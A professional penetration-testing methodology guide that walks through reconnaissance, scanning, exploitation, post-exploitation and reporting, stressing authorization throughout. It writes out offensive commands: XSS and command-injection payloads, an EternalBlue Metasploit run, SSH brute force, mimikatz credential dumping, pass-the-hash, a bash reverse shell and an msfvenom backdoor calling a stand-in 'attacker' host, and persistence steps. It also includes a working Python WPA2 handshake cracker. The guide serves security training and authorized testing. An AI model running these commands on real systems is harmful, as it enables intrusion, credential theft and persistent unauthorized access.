Penetration Testing Methodology: The Complete Professional Guide
Introduction
Penetration testing (pentesting) is a simulated attack, performed by security professionals under written authorization, to identify and demonstrate vulnerabilities before malicious actors exploit them. A well-executed test produces findings that are reproducible, prioritized by impact, and tied to concrete remediation; that is what actually improves an organization's security posture.
This guide covers the complete penetration testing methodology used by professional security consultants.
The Penetration Testing Lifecycle
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│    RECON    │────▶│  SCANNING   │────▶│   GAINING   │
│   (OSINT)   │     │   (Nmap)    │     │   ACCESS    │
└─────────────┘     └─────────────┘     └──────┬──────┘
       ▲                                       │
       │            ┌─────────────┐     ┌──────▼──────┐
       └────────────│  REPORTING  │◀────│ MAINTAINING │
                    │             │     │   ACCESS    │
                    └─────────────┘     └─────────────┘
Each phase feeds the next, and reporting closes the loop by scoping the next engagement. Post-exploitation (maintaining access) is only carried as far as the rules of engagement allow.
Phase 1: Reconnaissance (Information Gathering)
Passive Reconnaissance
Gather information without directly engaging the target:
# WHOIS lookup
whois target.com
# DNS enumeration
dig target.com NS
dig target.com MX
dig target.com TXT
# Subdomain enumeration
sublist3r -d target.com
amass enum -passive -d target.com
# Email harvesting
theHarvester -d target.com -b all
Active Reconnaissance
Directly interact with the target:
# Port scanning (all TCP ports with version and default-script detection; -O needs root and a full-range scan is noisy)
sudo nmap -sV -sC -O -p- target.com
# Service enumeration (banner grabbing)
nmap -sV --script=banner target.com
# Web directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
# Technology detection (the wappalyzer command is the npm CLI and takes a URL)
whatweb target.com
wappalyzer https://target.com
Information Gathering Checklist
- [ ] Company overview (LinkedIn, Crunchbase)
- [ ] Employee names and roles
- [ ] Email addresses
- [ ] Subdomains and IP ranges
- [ ] Technology stack
- [ ] Third-party integrations
- [ ] Public code repositories
- [ ] Past data breaches
Phase 2: Scanning and Enumeration
Port Scanning
# TCP SYN scan (requires root; half-open, so most services never log the connection)
sudo nmap -sS target.com
# TCP connect scan (no root needed; completes the handshake, so services log it)
nmap -sT target.com
# UDP scan (requires root and is slow; start with the most common ports)
sudo nmap -sU --top-ports 100 target.com
# Service version detection
nmap -sV -p 22,80,443 target.com
# Aggressive scan (-O, -sV, -sC and --traceroute together; noisy, use only where the rules of engagement allow)
sudo nmap -A target.com
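Scan output only becomes useful once it is parsed into a host/port inventory that drives the next phase. The following Python is an added example, not part of the original guide or of any nmap tooling: it parses the XML that `nmap -oX` writes (here a constructed, abridged sample for the documentation address 192.0.2.10, not a real scan) and maps each open service to the follow-up enumeration commands this guide uses. The FOLLOW_UP table and the field names are this example's own choices.

```python
import xml.etree.ElementTree as ET

# Constructed, abridged sample of `nmap -sV -oX scan.xml 192.0.2.10` output.
# Not a real scan result; 192.0.2.0/24 is a documentation-only address range.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.10">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="target.com" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.41"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="filtered" reason="no-response"/>
        <service name="mysql"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Follow-up enumeration per service, drawn from the commands in this guide.
# Keyed by nmap's service name; {ip} and {port} are filled in per finding.
FOLLOW_UP = {
    "http": ["nikto -h http://{ip}",
             "gobuster dir -u http://{ip} -w /usr/share/wordlists/dirb/common.txt"],
    "ssh": ["nmap -sV --script=banner -p {port} {ip}"],
    "microsoft-ds": ["enum4linux -a {ip}", "smbclient -L //{ip} -N"],
    "smtp": ["smtp-user-enum -M VRFY -U users.txt -t {ip}"],
}


def parse_nmap_xml(xml_text):
    """Return one dict per open port on each host that is up (filtered/closed ports are skipped)."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:  # explicit None check: an Element with no children is falsy
            addr = host.find("address")
        ip = addr.get("addr")
        for port in host.iterfind("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            findings.append({
                "ip": ip,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else "unknown",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
    return findings


def suggest_enumeration(findings):
    """Map each open service to the next enumeration commands from this guide."""
    commands = []
    for f in findings:
        for template in FOLLOW_UP.get(f["service"], []):
            commands.append(template.format(ip=f["ip"], port=f["port"]))
    return commands


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    for f in found:
        print(f"{f['ip']}:{f['port']}/{f['proto']} {f['service']} {f['product']} {f['version']}".rstrip())
    print("\nNext steps:")
    for cmd in suggest_enumeration(found):
        print(" ", cmd)
```

With a real engagement the same parser runs over `scan.xml` from `nmap -sV -oX scan.xml <scope>`; the host that is down and the filtered MySQL port are deliberately in the sample to show they are dropped, since only open services get follow-up work.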
Enumeration Techniques
# HTTP enumeration
nikto -h https://target.com
dirb https://target.com /usr/share/wordlists/dirb/common.txt
# SMB enumeration (-a runs all simple checks; -N attempts a null session without prompting for a password)
enum4linux -a target.com
smbclient -L //target.com -N
# DNS zone transfer (try each name server returned by `dig target.com NS`; a successful AXFR is itself a finding)
dig @ns1.target.com target.com axfr
# SMTP user enumeration (VRFY is often disabled; -M EXPN and -M RCPT are the other modes)
smtp-user-enum -M VRFY -U users.txt -t target.com
Vulnerability Scanning
# Network vulnerability scan: Nessus and OpenVAS are driven from their web UI or API rather than a one-line command;
# scan only the in-scope ranges and export the results for manual verification
# Web vulnerability scan (OWASP ZAP baseline scan: spider plus passive checks, safe for most targets)
zap-baseline.py -t https://target.com
# Specific vulnerability checks
nmap --script=vuln target.com
# Scanner output is a list of candidates, not findings: every result is verified by hand before it reaches the report
Phase 3: Exploitation
Web Application Exploitation
SQL Injection
# Error-based injection (--level and --risk raise the number of payloads; risk 3 adds OR-based payloads that can modify data when the injection is in an UPDATE statement, so stay within the rules of engagement)
sqlmap -u "https://target.com/page?id=1" --technique=E --risk=3 --level=5
# Boolean-based blind injection
sqlmap -u "https://target.com/page?id=1" --technique=B
# Time-based blind injection
sqlmap -u "https://target.com/page?id=1" --technique=T
Cross-Site Scripting (XSS)
# Basic reflected XSS test (alert() is proof only; never load external scripts in client browsers)
<script>alert('XSS')</script>
# Stored XSS test (fires without user interaction; document.domain proves which origin the script runs in)
<img src=x onerror=alert(document.domain)>
# DOM-based XSS: javascript: URI for sinks such as href or location that are assigned from user-controlled input
javascript:alert(document.cookie)
Command Injection
# Test for command injection (each form exercises a different part of the shell grammar: separator, pipe, conditional, substitution)
; ls -la
| whoami
&& cat /etc/passwd
$(whoami)
# Blind command injection (no output is returned): look for a measurable delay
; sleep 5
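To see why those separators work, and what the fix looks like, here is an added example in Python (not code from the original guide): a `ping` wrapper written the vulnerable way, a tokeniser that shows how a POSIX shell would parse the injected payload, and the hardened version that allowlist-validates the hostname and passes an argument list with no shell at all. `target.com`, the `ping` wrapper and the hostname pattern are this example's own assumptions.

```python
import re
import shlex
import subprocess

# The payloads from the section above (constructed test input; harmless as strings).
PAYLOADS = ["; ls -la", "| whoami", "&& cat /etc/passwd", "$(whoami)", "; sleep 5"]

# Characters that change how /bin/sh parses a command line.
SHELL_META = re.compile(r"[;&|$`()<>\n\r]")

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens, 253 chars max.
# Nothing that matches this can contain a shell metacharacter or whitespace.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_command_vulnerable(host):
    """The vulnerable pattern: user input interpolated into a string that is later handed to a shell
    (typically subprocess.run(cmd, shell=True) or os.system(cmd))."""
    return f"ping -c 1 {host}"


def shell_tokens(cmd):
    """Tokenise the way a POSIX shell would, so injected operators appear as their own tokens."""
    return list(shlex.shlex(cmd, punctuation_chars=True))


def shell_metacharacters(user_input):
    """Metacharacters present in the input; any hit means the input alters the command structure."""
    return sorted(set(SHELL_META.findall(user_input)))


def ping_argv_fixed(host):
    """Hardened: allowlist-validate, then return an argv list. With a list and no shell,
    the host is exactly one argument to ping, whatever characters it contains."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected host {host!r}: not a valid hostname")
    return ["ping", "-c", "1", host]


def run_fixed(host):
    """Execute the hardened form; shell=False is subprocess's default, so no shell parses the input."""
    return subprocess.run(ping_argv_fixed(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    for payload in PAYLOADS:
        cmd = ping_command_vulnerable("target.com" + payload)
        print(f"vulnerable: {cmd!r}")
        print(f"  shell sees: {shell_tokens(cmd)}")
        try:
            ping_argv_fixed("target.com" + payload)
        except ValueError as exc:
            print(f"  fixed: {exc}")
```

The token list is the point: `ping -c 1 target.com; ls -la` is one string to the developer but seven tokens to the shell, the fifth of which ends the `ping` command. Validation alone is not the fix (a hostname allowlist is only possible because the input has a tight format); the structural fix is the argv list, and the allowlist is defence in depth.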
Network Exploitation
# Check for vulnerable services (NSE exploit category)
nmap --script=exploit target.com
# Confirm MS17-010 before exploiting: EternalBlue can crash unpatched hosts, so agree it with the client first
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS target.com
run
# Exploit EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set LHOST attacker
run
# SSH brute force (check the account lockout policy first; against production, a handful of attempts per account, not a full wordlist)
hydra -l admin -P passwords.txt ssh://target.com
Wireless Security Testing
# Monitor mode
airmon-ng start wlan0
# Discover networks (note the channel and BSSID of the in-scope access point)
airodump-ng wlan0mon
# Capture handshake (replace 1 and MAC with that channel and BSSID; a client must (re)associate while you capture.
# Deauthenticating clients with aireplay-ng --deauth forces this but disrupts service, so it needs explicit permission in the rules of engagement)
airodump-ng -c 1 --bssid MAC -w capture wlan0mon
# Crack WPA2 (offline dictionary attack against the captured 4-way handshake)
aircrack-ng -w wordlist.txt -b MAC capture-01.cap
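What aircrack-ng does with the captured handshake is an offline dictionary attack: each candidate passphrase is stretched into a PMK, the PTK is derived from the two MAC addresses and the two nonces, and the KCK (the first 16 bytes of the PTK) is used to recompute the MIC on the client's EAPOL-Key message 2; a match reveals the passphrase. The Python below is an added example reimplementing that check, not aircrack-ng's own code. It embeds a fabricated handshake (SSID `CorpWiFi`, passphrase `Summer2024!`, made-up MAC addresses and nonces) in place of `capture-01.cap`; the PMK derivation is checked against the IEEE 802.11i test vector (`password` / `IEEE`).

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are why WPA2 cracking is slow per candidate and why wordlist quality matters."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)); first 16 bytes are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):  # 4 x 20 bytes of SHA1 output, truncated to 64 bytes
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]


# Byte offset of the 16-byte Key MIC field in an EAPOL-Key frame:
# 4 (802.1X header) + 1 (descriptor type) + 2 (key info) + 2 (key length) + 8 (replay counter)
# + 32 (nonce) + 16 (IV) + 8 (RSC) + 8 (ID) = 81
MIC_OFFSET = 81


def eapol_mic(kck, eapol_frame):
    """MIC over the whole EAPOL-Key frame with the MIC field zeroed; HMAC-SHA1 truncated to 16 bytes (WPA2/CCMP)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    """Dictionary attack: return the candidate whose derived KCK reproduces the captured MIC, else None."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def build_eapol_msg2(snonce, mic, key_data):
    """Minimal EAPOL-Key message 2 of the 4-way handshake (RSN, CCMP, HMAC-SHA1 MIC) carrying the given MIC."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: MIC set (0x0100), pairwise (0x0008), descriptor version 2 (0x0002)
            + b"\x00\x10"                # key length
            + (1).to_bytes(8, "big")     # replay counter
            + snonce
            + b"\x00" * 16               # key IV
            + b"\x00" * 8                # key RSC
            + b"\x00" * 8                # key ID
            + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X version 1, type 3 = EAPOL-Key


def constructed_handshake():
    """Fabricated capture (no real network) with passphrase 'Summer2024!'; stands in for capture-01.cap."""
    ssid = "CorpWiFi"
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP, PSK
    kck = derive_ptk(pmk_from_passphrase("Summer2024!", ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    unsigned = build_eapol_msg2(snonce, b"\x00" * 16, rsn_ie)
    return ssid, ap_mac, sta_mac, anonce, snonce, build_eapol_msg2(snonce, eapol_mic(kck, unsigned), rsn_ie)


if __name__ == "__main__":
    ssid, ap, sta, an, sn, frame = constructed_handshake()
    wordlist = ["password", "letmein", "Summer2024!", "Welcome1"]
    print("recovered passphrase:", crack_handshake(ssid, ap, sta, an, sn, frame, wordlist))
```

Everything the attack needs (SSID, both MACs, both nonces, the MIC and the EAPOL frame) is sent in the clear during association, which is why a passive capture suffices and why the only real defence is passphrase entropy or moving to 802.1X/WPA3.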
Phase 4: Post-Exploitation
Privilege Escalation
# Linux enumeration (run on the compromised host after transferring the scripts)
./linux-exploit-suggester.sh
./linpeas.sh
# Windows enumeration
winPEAS.exe
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
# Kernel exploits (match the exact kernel from uname -r; kernel exploits can crash the host, so prefer misconfigurations where they exist)
searchsploit linux kernel $(uname -r | cut -d. -f1,2)
Lateral Movement
# Pass the hash (pth-winexe takes the LM:NT hash pair in place of the password; impacket's psexec.py -hashes does the same)
pth-winexe -U 'DOMAIN/user%aad3b435b51404eeaad3b435b51404ee:NTHASH' //target cmd.exe
# Pivot to other machines (a SOCKS proxy only carries TCP connects, so use -sT -Pn; SYN scans and ICMP pings do not traverse it)
proxychains nmap -sT -Pn target2
# Harvest credentials (needs local admin / SeDebugPrivilege and is routinely flagged by EDR)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
Maintaining Access
# Reverse shell (start the listener first on the attacker host: nc -lvnp 4444)
bash -i >& /dev/tcp/attacker/4444 0>&1
# Persistence - SSH key
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
# Persistence - Scheduled task
schtasks /create /tn "Update" /tr "malicious.exe" /sc daily
# Create backdoor
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f exe -o backdoor.exe
# Every key, task and binary placed during the test is logged and removed (or handed over to the client) before the engagement closes
Phase 5: Documentation and Reporting
Finding Severity Classification
| Rating | Description | Example |
|--------|-------------|---------|
| Critical | Directly exploitable, leads to system compromise or data breach | Remote code execution, SQL injection reaching sensitive data or administrative accounts |
| High | Exploitable with some effort or preconditions | Stored XSS, authentication bypass |
| Medium | Limited impact or requires user interaction | Information disclosure, CSRF |
| Low | Minor impact | Weak cipher, minor information leak |
| Info | Informational, no direct security impact | Server version disclosure |
Rate on impact and likelihood in the tested environment (CVSS is the usual starting point); a scanner's severity is an input to the rating, not the rating itself.
Report Structure
# Executive Summary
- Scope
- Key Findings
- Business Impact
- Recommendations
# Technical Details
## Finding 1: SQL Injection
### Description
Detailed explanation of the vulnerability
### Impact
What an attacker could accomplish
### Proof of Concept
Screenshots, payloads used
### Remediation
Step-by-step fix instructions
### References
CVE, OWASP, etc.
Sample Finding Format
## Critical: SQL Injection in User Search
**Description:**
The search parameter in the user search functionality is vulnerable to SQL injection.
**URL:** https://target.com/search?q=test
**Payload:** ' OR 1=1--
**Impact:**
- Full database access
- Extraction of 50,000 user records
- Potential administrative access
**Remediation:**
1. Use parameterized queries (see code example)
2. Implement input validation
3. Apply principle of least privilege to database user
**Reference:** OWASP A03:2021 - Injection
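The parameterized-query fix referred to in the remediation above, as an added example in Python with SQLite (not code from the original guide or from any tested application): the vulnerable string-built query beside the bound-parameter version, run against a constructed three-row user table. The boolean pair is the manual form of what `sqlmap --technique=B` automates, and the `sqlite_master` UNION shows how one injectable parameter reaches the whole database. The table, users and `target.com` addresses are made up.

```python
import sqlite3


def build_db():
    """In-memory stand-in for the application's user table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email, role) VALUES (?, ?, ?)",
        [("alice", "alice@target.com", "user"),
         ("bob", "bob@target.com", "user"),
         ("admin", "admin@target.com", "admin")],
    )
    return conn


def search_users_vulnerable(conn, q):
    """The finding: q is concatenated into the SQL text, so a quote in q ends the string
    literal and everything after it is parsed as SQL."""
    sql = f"SELECT username, email FROM users WHERE username = '{q}'"
    return conn.execute(sql).fetchall()


def search_users_fixed(conn, q):
    """Remediation 1: the value is bound as a parameter. The SQL text is fixed at development
    time and q can only ever be compared as a string, quotes and comment markers included."""
    return conn.execute("SELECT username, email FROM users WHERE username = ?", (q,)).fetchall()


def boolean_test(search, conn):
    """Boolean-based detection: a true and a false condition appended to a valid value.
    Different results mean the input reaches the query; identical results mean it does not."""
    true_case = search(conn, "alice' AND '1'='1")
    false_case = search(conn, "alice' AND '1'='2")
    return len(true_case), len(false_case)


if __name__ == "__main__":
    db = build_db()
    payload = "' OR 1=1--"  # the payload from the sample finding
    print("vulnerable:", search_users_vulnerable(db, payload))
    print("fixed:     ", search_users_fixed(db, payload))
    print("boolean test, vulnerable:", boolean_test(search_users_vulnerable, db))
    print("boolean test, fixed:     ", boolean_test(search_users_fixed, db))
    # Escalation from the same parameter: read the schema through a UNION (SQLite's sqlite_master)
    print("schema:", search_users_vulnerable(db, "' UNION SELECT name, sql FROM sqlite_master--"))
```

Against the vulnerable function the payload returns every row and the UNION returns the CREATE statement, which is the "full database access" impact in the finding; the fixed function returns nothing for both, and the boolean pair collapses to (0, 0) because the input never reaches the parser. Remediation 3 (least privilege) is what limits the blast radius when a query is missed: a database account that can only read the tables the feature needs cannot return `sqlite_master` or write to `users`.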
Rules of Engagement
Before any pentest, establish clear rules:
## RULES OF ENGAGEMENT TEMPLATE
Scope:
- IP addresses: 192.168.1.0/24
- Domains: target.com, api.target.com
- Applications: https://app.target.com
Testing Window:
- Start: 2026-01-01 09:00
- End: 2026-01-07 18:00
- Maintenance window: None
Testing Types:
- Network penetration - allowed
- Web application testing - allowed
- Social engineering (phishing) - NOT allowed
- Physical security - NOT allowed
Rules:
- No DoS/DDoS testing
- No data destruction
- No exfiltration of real data
- Report immediately if customer data accessed
- Stop if asked by client
Escalation:
- Critical findings: Phone within 1 hour
- High findings: Email within 4 hours
Tools Every Penetration Tester Should Know
Reconnaissance
| Tool | Purpose |
|------|---------|
| Amass | Subdomain enumeration |
| TheHarvester | Email harvesting |
| Maltego | OSINT visualization |
| Shodan | Internet-facing devices |
Scanning
| Tool | Purpose |
|------|---------|
| Nmap | Port scanning |
| Nikto | Web vulnerability scanning |
| Dirb | Directory brute forcing |
| WPScan | WordPress scanning |
Exploitation
| Tool | Purpose |
|------|---------|
| Metasploit | Exploitation framework |
| Burp Suite | Web application testing |
| SQLMap | SQL injection automation |
| Hydra | Online password brute forcing (against live services; offline hash cracking is hashcat/John territory) |
Reporting
| Tool | Purpose |
|------|---------|
| Dradis | Collaboration platform |
| Serpico | Report generation |
| Faraday | Vulnerability management |
Legal and Ethical Considerations
Authorization Requirements
- [ ] Written authorization from system owner
- [ ] Defined scope with explicit boundaries
- [ ] Emergency contact information
- [ ] Rules of engagement agreed
Responsible Disclosure
## DISCLOSURE TIMELINE
Day 0: Vulnerability discovered
Day 1: Reported to the client through the agreed engagement channel; if the flaw is in a third-party product, the vendor is notified with the client's agreement
Day 30: Follow-up if the vendor has not acknowledged the report
Day 45: Escalation through a coordinator (for example CERT/CC) if there is still no response
Day 90: Coordinated public disclosure with full technical details, unless a fix ships sooner or an extension is agreed
Findings in the client's own systems are never published without the client's consent; the timeline above applies to vulnerabilities in third-party products found during the test.
Compliance Frameworks
- OWASP Testing Guide - Web application testing
- PTES - Penetration Testing Execution Standard
- NIST SP 800-115 - Technical guide to security testing
- OSSTMM - Open Source Security Testing Methodology
Career Path in Penetration Testing
Certifications
| Certification | Level | Focus |
|---------------|-------|-------|
| eJPT | Entry | Fundamentals, hands-on lab exam |
| OSCP | Intermediate | Hands-on network and web exploitation |
| OSCE3 (OSEP, OSWE, OSED) | Advanced | Evasion, web exploitation and exploit development (replaced the retired OSCE) |
| OSEE | Expert | Windows kernel and advanced exploit development |
| GPEN | Intermediate | Methodology, tooling and reporting (SANS/GIAC) |
Skills Development
- Foundation: Networking, Linux, programming
- Web Security: OWASP Top 10, web vulnerabilities
- Exploitation: Metasploit, buffer overflows
- Specialization: Cloud, mobile, network
Conclusion
Professional penetration testing is more than running tools—it's a systematic approach to finding and exploiting vulnerabilities. The methodology covered here provides a framework for thorough, effective security testing.
Key takeaways:
- Thorough reconnaissance - The more you know, the better your test
- Don't rely solely on tools - Manual testing finds what scanners miss
- Focus on impact - Not all vulnerabilities are created equal
- Document everything - Good reports drive real changes
- Stay ethical - Authorization and disclosure matter
DevSecure Team